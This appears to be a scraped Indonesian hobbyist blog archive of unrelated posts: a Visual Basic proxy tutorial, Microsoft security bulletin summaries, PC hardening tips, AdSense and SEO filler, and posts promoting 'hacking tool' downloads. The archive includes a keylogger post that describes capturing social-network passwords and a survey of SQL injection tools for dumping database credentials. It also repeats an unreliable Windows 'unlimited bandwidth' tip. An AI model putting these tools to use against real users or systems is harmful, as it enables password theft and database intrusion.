Terinpirasi dengan gempa yang kemarin gw alami di kota gw tercinta, TASIKMALAYA. Gw mencoba mengabadikannya lewat Program Yang Beberapa Hari Lagi Akan gw postingkan untuk kalian semua, betapa hebat nya gempa kemaren sampe gw sempoyongan pada saat keluar rumah kaya orang sehat orang mabok saking gede nya tuh gempa. BMG mengatakan gempa yang menimpa gw berskala 7.3 SR, yang bikin semua rumah di kota tercinta ini bergetar, ada banyak rumah yang terkena imbas dari sang gempa ini. Mungkin Allah masih berbaik hati memberikan cobaan ini kepada kami,Alhamdullilah gw n family kagak kenapa - napa, gw ngga tahu orang" yang deket dengan pusat gempanya, ada berita seh rumah" mereka ambruk rata dengan tanah. Untuk projectnya mungkin gw akan share minggu depannya karena project programnya baru gw bikin layout ny aja. sabar ya...
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E-book. Free VB eBook - The most elementary single-thread Proxy in Visual Basic. In creating this manual we set ourselves the task to develop a minimum program code playing the role of Proxy-server (transmitting information from one port to another). It is easy to add filtration functions to the program (it will be shown in the supplement), log records, information substitution records (link addresses, advertisement in HTML - for web site promotion).
Free VB ebook Create standard Visual Basic project. Deploy element Label “this computer’s IP” on the form
Connect a new Winsock component to the project for work with the network according to TCP/IP protocol
Project Components Winsock Control Component
Winsock - Winsock component
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Deploy two Winsock copies on the form. Winsock1 – for the server part and Oflameron for the client part. The server part (Winsock1) receives queries from the Web-browser (for example, Internet Explorer) through the port, for example, 125 and transmits it to the client part. The client part Oflameron (Winsock2) through standard port 80 transmits queries to the real Web-server.
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Write the Proxy server part
Private Sub Form_Load()
Form1.Visible = True
Do ''Switch the server part to port listening ( Listen )
If Winsock1.State <> sckConnected And Winsock1.State <> sckListening Then ''If there is no connection yet and the port cannot be heard
Winsock1.Close ''Close the connection
Winsock1.LocalPort = 125 ''Port number for listening
Winsock1.Listen ''Begin listening port 125
End If
Loop ''Repeat
End Sub
Connections processing
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) ''If there is query for connection
Winsock1.Close ''Stop listening the port
Winsock1.Accept requestID ''Connect the client (browser) according to the number of the query
End Sub
Winsock1_ConnectionRequest – query for connection
Connection Request
Announce the variable
Dim ToServer As String ''To send the query from the client part of Proxy to Web-server
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) ''Processing of incoming data (queries from Web-browser)
Dim ServerData As String ''Announce the variable for the received data ServerData
Winsock1.GetData ServerData ''Accept data into the variable
ToServer = ServerData ''Copy the query into the variable for sending to the Web-server
Oflameron_SendToWebserver ''Send the query to the Web-server
End Sub
Line “ToServer = ServerData” - is not mandatory, it is worthwhile, if it is necessary to process data writing in the log, filter, search for data in queries, substitute information (for example, change URL in downloaded web-pages for one’s own) etc.
The entire VB project of this development stage is in the file vbpt1.zip
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Write the Client part of Proxy
For work with real Web-server. Connection to Web-server, sending of queries and data receipt.
Announce the variables
Dim Webport ''Port number
Dim Data As String ''To receive data from Web-server
Private Sub Oflameron_SendToWebserver() ''Connect to Web-server
Oflameron.Close ''Close the connection
Oflameron.RemoteHost = "" ''Web-server address or its IP address
Oflameron.RemotePort = 80 ''Port number. Standard for HTTP
Oflameron.Connect ''Connect to Web-server
Webport = Oflameron.RemotePort ''Remember the port number (optional line)
End Sub
Procedure Oflameron_Connect performs actions as soon as the Web-server is connected
Private Sub Oflameron_Connect() ''Sent query to Web-server
If Oflameron.State <> sckConnected Then Exit Sub ''Check. If there is no connection, abandon the procedure
Oflameron.SendData ToServer ''Send the query line to the Web-server
End Sub
The procedure of data receipt from the Web-server
Private Sub Oflameron_DataArrival(ByVal bytesTotal As Long) ''The call will be initiated as soon as some data is received from the Web-server
Text1.Text = Oflameron.State
If Oflameron.State <> sckClosing Then
Oflameron.GetData Data ''It will contain data obtained from the Web-server
Winsock1.SendData Data ''Send the obtained data from Web server to Web-browser
End If
End Sub
HTTP- put port number 125 for the server part of Proxy
Change Proxy and port settings in Internet Explorer, if you use IE
So that queries were sent to our Proxy
LAN adjustment
Where LAN - the address of our Proxy (IP-address of your computer) and port 125, which will listen to the server part of your Proxy
Upload the page from the Web-server to Internet Explorer website
Proxy-server operates –sends queries and received data.
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This is a working example of a most elementary Proxy-server in the minimal code configuration. It allows to understand important specifics of network programming, create a working copy of the program.
Hi Vbker Dan Semua Pencinta Blog Wa ini, Oh Ia di artikel wa kale ini wa akan mengungkap rahasia tentang kelemahan OS Windows, untuk jelasnya silahkan download Tool Hacking nya dolo dan penjelasanna adalah sebagai berikut :
Microsoft pada Selasa (09/09) lalu telah meluncurkan summary bulletin keamanan bulan September 2008. Empat bulletin tersebut antara lain, Windows GDI+, Windows Media Player, dan Microsoft Office OneNote, dan keempatnya telah mendapat perhatian penuh Microsoft dan pihaknya akan memberikan hasil patch dari kelemahan IE pada bulan ini. Mulai bulan depan, Microsoft berencana untuk share detail teknisnya dari kelemahan yang ada di software milik Microsoft, yang sekaligus mengupdate produk yang terkena imbasnya, sebelum software tersebut diumumkan ke public.
Selain itu, pada bulan Oktober, Microsoft juga akan mulai menyediakan setiap bulletin dengan sebuah Exploitability Index untuk membantu administrator system memasukan patch dalam bulletin. Semua patch keamanan Microsoft, baik untuk Windows ataupun Office dapat diperoleh dari Microsoft Update atau keterangan di bawah ini :
MS08-052, dengan judul “Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)”. Kelemahan tersebut ada pada software Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008, Microsoft Internet Explorer 6 Service Pack 1 ketika diinstal di Microsoft Windows 2000 Service Pack 4. Selain itu juga ada Microsoft Digital Image Suite 2006, SQL Server 2000 Reporting Services Service Pack 2, semua SQL Server 2005, Microsoft Report Viewer 2005 Service Pack 1, dan Microsoft Report Viewer 2008. Microsoft mengungkapkan kelemahan dalam semua software tersebut dapat menyebabkan eksekusi kode tertentu, jika user melihat file gambar terentu menggunakan software di atas atau browsing ke website yang mengandung content yang ‘jahat’.
MS08-053, dengan judul “Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156)”. Kelemahan tersebut dapat berimbas pada Microsoft Windows 2000, Windows XP, dan Windows Vista, Windows Server 2003 dan Windows Server 2008. Microsoft mengunkapkan kelemahannya yakni menyebabkan adanya eksekusi kode yang ‘jahat’, jika user melihat website yang ‘jahat’. Attacker yang sukses mengeksploitasi kelemahan dalam software tersebut, kemudian akan mengambil alih control system secara penuh.
MS08-054, dengan judul “Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)”. Kelemahan tersebut akan memberikan efek ke Windows Media Player 11. Microsoft menjelaskan bahwa kelemahan dalam Windows Media Player 11 dapat memudahkan eksekusi kode dari jarak jauh oleh attacker, ketika file audio ‘jahat’ masuk ke server Windows Media. Jika user log on dengan menggunakan kunci adiministratif milik user, maka attacker yang sukses mengeksploitasi kelemahan ini dapat mengambil seluruh control ke system computer.
MS08-055, dengan judul “Vulnerability in Microsoft Office Could Allow Remote Code Execution (955047)”. Kelemahan terjadi pada Microsoft Office OneNote 2007 dan Microsoft Office XP, Microsoft Office 2003, dan 2007 Microsoft Office System. Microsoft menjelaskan, jika user meng-click URL OneNote yang ‘jahat’, maka attacker kemudian akan mudah mengontrol system computer user.
sumber: beritanet.com
Wogh Serem tuh title,hehe. Kale Ini gw maw berbagi ilmu tentang bagaimana mencegah hacker. neh artikel wa ambil dari rum nya Devil Bats tanpa banyak babibu lagi artikel nya seperti ini :
1. Pasang Firewall
Dari sekian firewall yang gua coba, gua paling seneng ama Zonealarm. Settingannya ga rumit and ada freeware versionnya. Freeware versionnya sudah cukup aman untuk pc loe.
2. Block incoming NetBIOS
Musuh dalam selimut bisa jadi tetangga atau teman yang dalam satu apartemen (LAN). Kalau ini di block, sharing antar LAN tidak berfungsi, sehingga loe invisible di LAN. Ini sangat penting untuk mengamankan data-data loe yang loe share dengan security terendah, alias semua orang yang berada di LAN bisa meng-copy bahkan menghapus data-data loe. Bayangin aja kalau loe tinggal bersama 100 orang di sebuah gedung yang semuanya bisa liat isi sharing folder loe =p
Cara block incoming netbios di zonealarm cukup mudah, naekkan level firewall dari "trusted" ke "internet".
3. Aktifkan port forwarding seperlunya saja
Port Forwading sering digunakan oleh para user yang mempunyai koneksi internet flatrate yang menggunakan router.
Pada dasarnya router memblock semua port diatas 1024 secara default. Sehingga bila loe ingin menggunakan applikasi yang membutuhkan suatu port tertentu agar bisa jalan. Mengaktifkan port forwarding memberitahu router untuk langsung menuju komputer loe sehingga musti diblock dengan firewall kalo ga dibutuhkan.
4. Windows update
Windows update sangatlah penting untuk menutup lubang-lubang di windows loe. Aktifkan automatis download and install windows-update nya di control panel.
5. Pasang antivirus
Online tanpa menggunakan antivirus ibaratnya seperti orang yang melakukan hubungan intim dengan pasangan tak sah tanpa memakai k*nd*m.
Tentu saja, dipasang saja ga ada gunanya. Virus definiton nya musti sesering mungkin di update.
6. Gunakan Firefox 3.x
Browser pun juga memegang peranan penting dalam hal online. Gunakan browser firefox atau browser lain yang support pop-up blocker dan tidak memiliki fasilitas active-x untuk mengunjungi site2 yang biasa loe kunjungi. Gunakan Intenet Explorer HANYA untuk site yang memakai Active-X and site itu sudah loe kenal akan keamanannya.
Firefox 3.x banyak feature2 baru yg bikin browsing jd lebih aman. Gunakan add-ons dibawah ini untuk menambah keamanan dr browsing:
a. Adblock Plus (https://addons.mozilla.org/en-US/firefox/addon/1865)
Addons ini banyak sekali membantu nge-block popup2 yg biasanya bisa berisi virus.
Untuk menggunakan addons ini, setelah install harus mendownload Filter. Pilih saja filter "Easy List".
Setelah pasang addons ini, silahkan coba pergi ke website yg biasanya popup tetep bisa muncul walaupun build-in popup blocker nya Firefox aktif. Popup apa aja yg telah berhasil di block bisa diliat dengan meng-click icon merah "ABP" di pojok kanan atas.
b. WOT (https://addons.mozilla.org/en-US/firefox/addon/3456)
Addons ini berfungsi untuk pre-check apakah website yg akan di kunjungi rawan akan virus, spyware, phising, dll.
c. Perspectives (http://www.cs.cmu.edu/~perspectives/firefox.html)
Semenjak Firefox 3.x, semua secure connections website (https) yg mempunyai invalid certificate atau certificate yg tidak dikenal Firefox akan otomatis di block. Hal ini tidak terjadi dengan Firefox 2.x. Firefox akan memberikan peringatan yg memang rada annoying.
Dengan adanya addons ini, peringatan2 seperti itu akan di override kalau emang tuh site bener-bener aman. Addons ini bukan hanya meng-override settingan Firefox melainkan juga membantu Firefox mengecheck untrusted certificate yang membikin kalian lebih aman waktu menunjungi site2 seperti online banking atau e-shopping.
Keterangan lebih lanjut bisa diliat di website-nya Perspectives.
Jangan lupa juga untuk mengaktifkan fungsi "Clear private data". Set aja setiap Firefox di tutup, semua cookies and cache dibersihkan.
7. Gunakan Spyware Doctor
Download free version nya dgn Google Pack.
Dari sekian spyware removal software yg pernah aku coba, hanya Spyware Doctor yg menurutku plg jago detect spyware. Alternatif bisa juga pakai Spyware Terminator atau Spybot Search & Destroy.
8. Download software selalu dari official site
Biasakan mendownload software dari official site, jangan dari mirror yang ada di internet, karena bisa saja software tersebut terdapat trojan.
9. Jangan buka email yang tak dikenal
Email yang tak dikenal ini biasa disebut spam. Biasanya rata-rata berisi link dari beberapa site yang bila di-klick, nantinya akan terinstall sesuatu ke dalam komputer, bisa virus, trojan atau spyware.
10. Lakukan transaksi dengan https
Selalu check browser loe apa https atau icon gembok ada di browser loe untuk transaksi online. Hampir semua banking selalu menggunakan https, bila tidak, loe patut curiga akan kebenaran sitenya itu.
11. Hidupkan Bluetooth seperlunya saja
Yang namanya maling bisa masuk lewat mana saja. Gunakan Bluetooth hanya dalam men-transfer data dari ponsel ke komputer atau voice chat. Selebihnya matiin saja.
12. Jangan connect ke Wi-Fi tanpa menggunakan key
Wi-Fi yang tanpa menggunakan key, alias siapa saja bisa connect, biasanya menjadi sasaran pada orang iseng untuk membuka data-data di laptop/pc loe. Kalau NetBIOS di block, masih ok, walaupun resiko masih ada.
Merdekaaaaaaaa !!!, Sebuah kta yang diucapkan oleh para pejuang kita dolo, oh ya di blog wa ini. Dah wa pasang tool" hacking, tapi inget loh tool" ini hanya untuk Pengetahuan semata, apabila ada hal" dalam tool ini di salah gunakan maka dengan seksama saya akan memreupblish tool" yang bersangkutan.
1. Hacker
Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.
2. Cracker
Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.
Hirarki / Tingkatan Hacker
Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
2.Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3.Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4.Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.
Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak Sumber Artikels
Apa itu keylogger? sebenarnya keylogger itu semacam software yang digunakan untuk memantau kegiatan keyboard komputer, setiap tombol yang di tekan oleh user maka semua record akan di simpan dengan keylogger. Buat para orang tua biasa nya mereka memantau anak nya yang sedang browsing dengan cara memasang keylogger di komputer, jadi semua situs yang di “search” oleh si anak akan terekam oleh keylogger. sehingga semua situs yang berbau porno bisa langsung ketahuan oleh si orang tua. Biasa nya keylogger akan di deteksi sebagai vrus oleh “antivirus”, karena memang keylogger bisa menjadi 2 mata pisau yang bisa MENGAMANKAN dan juga bisa MEMATIKAN. Maksud nya mematikan adalah, keylogger bisa saja di gunakan oleh orang-orang yang tidak bertanggung jawab untuk melakukan hacking, banyak orang ingin mencoba melakukan hack pada situs social networking seperti facebook dan friendster. Jadi tinggal di instal di komputer lalu orang yang menggunakan komputer tersebut akan terekam seluruh kegiatan nya termasuk kegiatan memasukkan “password dan username” facebook dan friendster. bisa saja hal ini dilakukan oleh para pemilik warnet yang iseng dan tidak bertanggung jawab, atau bisa saja dilakukan oleh si pengguna komputer sebelum nya dengan cara mematikan fungsi antivirus nya terlebih dahulu lalu kemudian menginstall keylogger. Untuk mencari keylogger bisa di cari di kotak kiri sebelah atas dengan kata kunci “keylogger”, nah kalo udah download jangan di pake buat yang negatif-negatif ya…ini hanya buat contoh saja. Nah, ada beberapa cara untuk menghindari cara pencurian “privacy” seperti ini: 1. Lihat search engine di kiri atas “HasiAulia.Net” lalu cari dengan kata kunci “save password” atau “encrypt password” 2. Simpan baik-baik aplikasi tersebut di flashdisk anda dan ketika anda ingin mengisi username dan password di facebook atau friendstersilahkan jalankan aplikasi tersebut, maka keylogger pun akan ter-enkripsi (teracak-acak) dalam menyimpan kegiatan keyboard kita. sehingga keylogger tidak akan bisa mencuri password dan username kita. Untuk mendownload keyloggernya bisa di download di
Command-Command Dasar Untuk Linux
Logo LinuxSistem Operasi Linux semakin digunakan oleh banyak orang karena sifatnya yang open source.
Namun Sistem operasi ini tidak dapat terlepas dari yang namanya command dan console.
Berikut command-command dasar Linux yang perlu untuk dipelajari agar kita dapat menggunakan Linux dengan baik.
Contoh : $ cat namafile
Fungsi : Menampilkan isi dari sebuah file di layar.
Fungsi : Digunakan untuk berpindah direktori seperti fungsi cd dalam windows.
Contoh : $ chmod 777 namafile/nama direktori
Fungsi : Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori.
Fungsi : Digunakan mengganti owner dari suatu file atau direktori.
Contoh : $ cp
Untuk menyalin file atau copy. Misalnya untuk menyalin file1 menjadi file2.
Contoh : $ find . -name *.doc -print
Fungsi : Untuk mencari letak sebuah file.
Contoh : $ grep
Fungsi : Digunakan untuk mencari file-file yang mengandung teks dengan kriteria yang telah Anda tentukan
Contoh : $ gzip
Fungsi : Digunakan untuk mengkompresi sebuah file
Contoh : $ kill
Fungsi : Digunakan untuk menghentikan proses yang sedang berjalan.
Fungsi : Digunakan untuk menampilkan isi dari sebuah direktori seperti command dir dalam windows.
Fungsi : Digunakan untuk melihat modul-modul yang ada
Fungsi : Digunakan untuk menghapus modul-modul yang ada
Contoh : $ mkdir
Fungsi : Digunakan untuk Membuat direktori baru seperti command md di DOS.
Fungsi : Digunakan untuk memindahkan file dari satu lokasi ke lokasi yang lain.
Fungsi : Digunakan untuk menampilkan nama direktori dimana anda saat itu sedang berada.
Fungsi : Digunakan untuk mengganti password root.
ps aux
Fungsi : Digunakan untuk melihat proses-proses yang sedang berjalan.
Fungsi : Digunakan untuk menghapus file, tetapi secara default command rm tidak menghapus direktori.
Fungsi : Digunakan untuk menghapus direktori kosong.
Fungsi : Digunakan untuk menginstall file rpm
Fungsi : Digunakan untuk login sementara sebagai user lain.
Fungsi : Sebuah perintah untuk menjalankan servis.
Fungsi : Sebuah perintah untuk menghentikan servis.
Fungsi : Sebuah perintah untuk mematikan sistem.
Contoh : $ tar
Fungsi : Menyimpan dan mengekstrak file dari media seperti tape drive atau hard disk.
Contoh : $ unzip
Fungsi : Digunakan untuk mengekstrak atau menguraikan file yang dikompres dengan zip.
Fungsi : Digunakan untuk menampilkan siapa saja yang sedang login.
Why, on your web pages of course. Ok, just kidding. The real question should be: “Is there really any truth to the rumors that where you place those Google Adsense ads can actually improve response?” According to my best information, the answer to that question is: Yes.
Google’s own Adsense experts say that that there is a direct correlation between the placement of the Adsense ads and the resulting click through.
When ads are placed in “content zones”, rather than in “advertising zones”, response rates on Google Ad Words goes up. There are also indications showing that ads appearing on the right side of the page get clicked more than ads appearing on the left side.
Advertising analysts with degrees in human behavior and psychology have spent thousands of man-years (people-years?) studying how people read printed and Internet content and what it takes to get them to respond to ads. While some of these studies are proprietary, or are only available to anyone with $10,000 or more to spend on a copy, other studies have been made public and can be read by anyone who is interested.
Google themselves has released some relevant information which is focused directly on increasing your Google Adsense response. In Google Adsense, all the webmaster has to do is place a code on his website and Google takes care of the rest. The ads that Google would place on your site would generally be relevant to the content of your site. This would be advantageous both for you and for the advertiser, as the visitors of your site would more or less be actually interested with the products being advertise.
Of course, all of the studies in the world aren’t worth a hill of beans if the findings don’t work on your web site. That’s why it is important to test, test and test again. Experiment with your Google Adsense placement and track the results over a period of time. Google provides response tracking tools in your Adsense control panel. Learn how to use them. As you begin to see what may be only subtle differences in response, you’ll be able to determine what works best for your particular site. But don’t get complacent. What’s working for you now might not work next month if you change your site design or content.
One of the most important factors in determining placement of your ads is the type of content that your site delivers. If you are primarily an e-commerce site, and you have a lot of pictures and ad copy for your own products competing for attention against Adsense ads, then it is going to be a particularly tough challenge getting any kind of decent Google Adsense click through. It is situations like this that require very thorough testing and a lot of trial and error.
Blogs seem to have a lot of success generating high response rates to Google Adsense listings. Perhaps it’s because blog readers realize that ad revenue is the only way that their favorite blogmaster can keep the lights on, so the readers think of clicking on ads as a way to make a donation.
Regardless of what the experts say, your best bet is to tailor your Google Adsense ad placement to what your own experience shows works best for you. In the end, you’re the only expert who matters. My Source
A targeted, loyal mailing list is essential to growing an online e-Book business that will send a steady stream of income right into your bank account.
When you have a mailing list, you can build up customer loyalty and create a relationship with your subscribers that will have them more than willing to buy your products.
You are probably slightly puzzled right now about why people would want to join your mailing list, or anyone's mailing list, for that matter.
Here's why. Almost everyone searching on the Internet is looking for information they want or need for hundreds of reasons.
That search can be for "How-To" manuals on almost any subject you can think of, like how to make money online, how to grow better roses, how to win contests or how to research their family history, for example.
They are also looking for technical tips, crocheting patterns, activities for kids and secret recipes to amaze their friends at the next get-together. As you can see, the search for information is an endless pursuit.
When you identify an active niche that interests you, the next thing you have to do is create, a short e-Book or report that would appeal to the members of your selected niche.
It doesn't have to be a long 40-60 page tome, but just a 10-15 page short report on some facet of your target niche.
Maybe you know 10 steps to make some task easier or 6 ways to drive your neighbors crazy with your year-round emerald green lawn. You get the idea?
Once you create the report, put it in PDF format and give it away to anyone who will sign up for your list.
Using an auto responder service, you can put this part of your business on autopilot and have the opt-in form saved and the download link automatically sent to the new member of your list as soon as they verify their subscription.
Look for newsletters, blogs and forums related to your niche and join them. Sign up for the newsletter and the blog, join the forums and become an active member.
Here's the secret about this process. Add a link to your landing page and an intriguing question to your signature and put them on any comment you make on anything. Add that signature to every email you send.
Never click "Enter" or "Send" without making sure your signature is at the end of whatever you are doing. Write a few short articles, 400-500 words each, on your niche and submit them to article directories.
Make sure you add an author's box at the end of the articles with your link visible in it. Newsletters and blog webmasters will pick them up and publish them for the enjoyment of their readers.
Article submission is the heart of viral marketing and is very successful for sending interested traffic to your site.
Your goal here is to create a reputation and some credibility online with the articles, membership in forums, newsletters and blogs.
Your total focus has to be on getting dedicated users interested in your information and clammering to get more of it.
Marketing your website is the one technique you should master for your own survival and success online. Offer an article to a newsletter webmaster and the blogs you joined, with your link in them, of course.
This e-Book marketing strategy has had a lot of success and it is widely used by hundreds of online marketers. My Source
Search engine optimization is the most passionately challenged theme. SEO is a central module that permits you to publicize straightforwardly to your potential customers. SEO is all about receiving the sites with top privileges on the major search engines with the core intension to strike the definite consumers. You can publicize the website by utilizing different tackles, procedures and search engine optimization approaches. For more information visit to www.impacts-audio.com These procedures and techniques cover-up all the factors that can help us to generate higher page ranks. It’s time consuming process not as easy as it looks and not even difficult if done with the right approach.
Keywords Phrase:
You know very well that millions of websites are there on the one theme and how much tricky it is to take out your site at the topmost position. SEO companies work with keywords to make the high ranks at specific keywords.
Even if your site got the high ranks on specific keywords but if nobody is searching for those keywords then what is the fun of having those top ranks. The result would definitely be zero, because your aim is to target the visitors.
The content of your site should not be stuffed with the keywords. The keywords should be in a definite proportion and placed in a planned approach, excessive use of keywords may wind up engulfing your market.
Link Framing:
One another SEO tool that is significant in Search engine ranking is link framing or link building that can enhance your web ranking constantly and efficiently. Link Framing includes number of sites of the similar type to be hyperlinked with each other to get more traffic for each site and increased SEO rankings. If you are able to acquire links that are optimized for keywords and are booming inside content then it will surly take your website rankings at new heights.
Content is the ruler of a web and good content has a great impact from all point of views, it increases the SEO ranking, attract the targeted consumers and make your site much appealing. Content is the main factor which can bring visitors on your site continually and this thing is very important in SEO that once you got good ranking, then there is need to maintain that level. This is possible if your site has the potential to magnetize visitors and hold them. Content with the unique and revealing features definitely invites people and can generate incredibly meaningful traffic.
Article Submissions:
Article submission is good technique to get amplified traffic to your site. Perfectly-composed articles have excellent probability to get accepted in major submission sites and if your article is liked by the readers then they will definitely check out the resources by which the article is being written.
Meta Information:
Many search engines give importance to the tags consisting of the TITLE tag, Meta Description tag and Meta Keyword tag.for more help go to www.10-website-programming-tricks.com Title tag should be written strictly according to your web page theme, the title should comprehensively reveal the subject matter.
Unexpectedly at present META tags bear a little credence in all of the standard search engines. But still some search engines gives the added preferences to the META tags which are placed with the relevant information and proper keywords demonstrating the web page. My Source Articles
Pengertian Sedikit Tentang Bandwith :
Bandwidth (disebut juga Data Transfer atau Site Traffic) adalah data yang keluar+masuk/upload+download ke account anda.
Contoh: Ketika anda menerima/mengirim email, asumsikan besarnya email yang diterima/dikirim adalah 4 KB, berarti secara teori, untuk bandwidth 1.000 MB (1.000.000 KB) anda bisa *kirim* 250.000 email atau berbagai variasi antara kirim/terima, misalnya 100.000 kirim, 150.000 terima. Ini hanya contoh untuk penjelasan bandwidth, pada kenyataannya, data yang keluar masuk ke account bisa datang dari pengunjung (yang mendownload halaman website ke PC-nya), atau anda upload gambar/file ke account dan sebagainya.
Bandwidth/Site Traffic dihitung per bulan & bisa dilihat di cPanel.
Jika anda mengenal Telkom Speedy, Bandwidth ini cara kerjanya sama dengan Kuota di Telkom Speedy. Hanya saja yang menjadi acuan bagi perhitungan kuota Telkom Speedy adalah data yang keluar/masuk ke PC/Modem ADSL anda, sedangkan di hosting acuannya adalah data yang keluar/masuk ke account.
Setelah baca halaman atas pasti ingin kan bandwith kita naik dan ngga terbatas, ini ada trik n tips buat sistem operasi Windows, Tips n Trik nya seperti ini :
1. Klik Start, kemudian Run
2. Ketik gpedit.msc lalu klik OK
3. Setelah masuk, klik pada Administrative Templates kemudian klik Network
4. Setelah terbuka, silahkan klik pada QoS Packet scheduler
5. Klik Limit Reservable Bandwidth dan ubah settingan menjadi Enable
6. Rubah Bandwith yang asalnya 20 menjadi 0 supaya tidak terbatas Bandwithnya
7. Klik Apply, kemudian ok
8. Setelah semuanya selesai, silahkan keluar dan Restart computer anda.
Selamat Mencoba
Sering kita alami, virus" / malware yang masuk melalui autorunnya windows, kalian taw kenapa virus / malware tuh masuk pada saat autorun? Karena auto runnya windows itu tidak dapat melindungi script nya sendiri beda sama linux ataupun macintos yang membentengi memproteksi dirinya dari script sistem operasi dirinya sendiri.
ok tampak banyak ba bi bu lagi gw akan membahas langsung pada pokok permasalahan nya :
1. Buka run pada komputer lw, atau dengan menekan ctrl + r
2. Ketikan ini di tab run yang lw punya "gpedit.msc" tanpa tanda kutip y bro
3. Terus klik terus pilih
4. "Turn off AutoPlay" Klik Ganda atau klik kanan pada komputer lw bro ntar ada gambar seperti ini :
5. langkah berikut nya
6. Klik Enabled Lalu Tekan Apply dan ok
7. Selesai Deh, Sedia Payung sebelum hujan bener ngga bro ^^
Untuk yang kemaren dah download program gw tapi ngga bisa di pake gw minta maaf sebesar" nya untuk menembus kesalahan gw silahkan download ulang lagi, karena yang kemaren gw set kadaluarsa, yang menyebabkan program tidak dapat di buka karena masa waktu telah habis, dan sekarang sudah gw perbaiki silahkan download programnya. jangan lopa komentar nya y sob...
I’m not going through the sql injection basis as we already have a nice guide in depth and there is a number of references on the internet.
But I’m going to make some rough classification of every tool listed so that this can serve as a quick reference.
I am going to list here the most used tools for sql injection exploitation. There are some others to find the sql injection in a website as well. But this shouldn’t be an issue for a professional.
The explotitaion tools work for different kind of DBMS and using different techniques such as error based sql injection, inband or union based sql injection and blind sql injection.
To date, MS SQL Server is the DBMS that has the highest number
of attacking tools available. It is prone to error based sql injection thus retrieving data from it is as easy as providing the vulnerable url to tools like Priamos and Absinthe and clicking a button.
These tools are not free from bugs. Sometimes they fail to receive correct data, but if you’re not a script kiddie there’s no way you can miss it.
Priamos Download Tools Here
* Works on SQL server only
* Enumerates databases, tables and data in a very nice GUI
* The only big problem is that it works only with GET requests, unless you make it pass through a proxy to change the request to POST and shift the query string to the http request payload.
* Allows for proxy tunneling
* Very fast
Beside some bugs that affect the tool, 2.0b version works with
* Blind sqli
* Error based sqli
and does a better job than 1.41 version.
Blind mode supports: SQL Server, Postgre, Sybase, Oracle.
Error based mode supports SQL Server
* good GUI from which fine tuning the injection parameters and additional options like authentication.
Injection is feasible through
Allows for proxy tunneling
It’s the best tool to deal with Mysql sql injections. The only tool that does the job sometimes.
* It’s python powered so it’s cross platform.
It supports:
* Oracle
* PostgreSQL
* Microsoft SQL Server.
SQLmap supports two operating modes:
* Blind SQLi
* Inband (Union) Sqli
Before going for Blind sql injection, that is slow and requires a lot of requests to the server, it is possible to check for UNION based sqli availability that gives faster results.
SQLmap performs blind sqli recognition through hashes of the http response text. It is possible to specify the string to match in the response text when the case is TRUE. A very needed feature sometimes.
It supports injection into
and retrieves:
* databases username and password
* DBMS version
* databases
* tables
* data
It allows to execute custom SQL queries as if you were on a real SQL client connected to the remote DBMS. This saves a lot of time and allows for very sophisticated data retrieval.
More options are:
* proxy support
* google dorks
* remote file retrieval.
In the tool package a very nice guide on the tool usage is given
It’s written in perl and requires that you read the guide or watch the nice flash video before you can really enjoy it.
It works only against SQL Server DBMS and performs dumo of
* database
* tables
* data
It is possible to retrieve DBMS users and passwords. It’s quite fast, in my opinion Priamos and Absinthe do a better job.
A good backup tool though.
To sum up
Mysql SQL Injection tools:
* SQL Map (blind and inband)
Oracle SQL Injection tools:
* SQL Map (inband)
* Absinthe (blind)
Sybase SQL Injection tools:
* Absinthe (blind)
MS SQL Server SQL Injection tools:
* Atomagic (error)
* SQL Map (error and inband)
* Priamos (error)
* Absinthe (error)
If the list is not exhaustive…well…these at least are the most known and used.
Of course every professional has his own tools and patches to improve these tools or adding functionalities. Your own tool is always the best tool.
Any suggestion or addition is encouraged!
Neh gw dapet dari rum Sebelah Neh Artikel Ini Semata - Mata hanya untuk ilmu pengetahuan, apabila ada yang tidak berkenan maka segera artikel ini akan gw unpublish.
================ Yahoo Hacking Tools ============
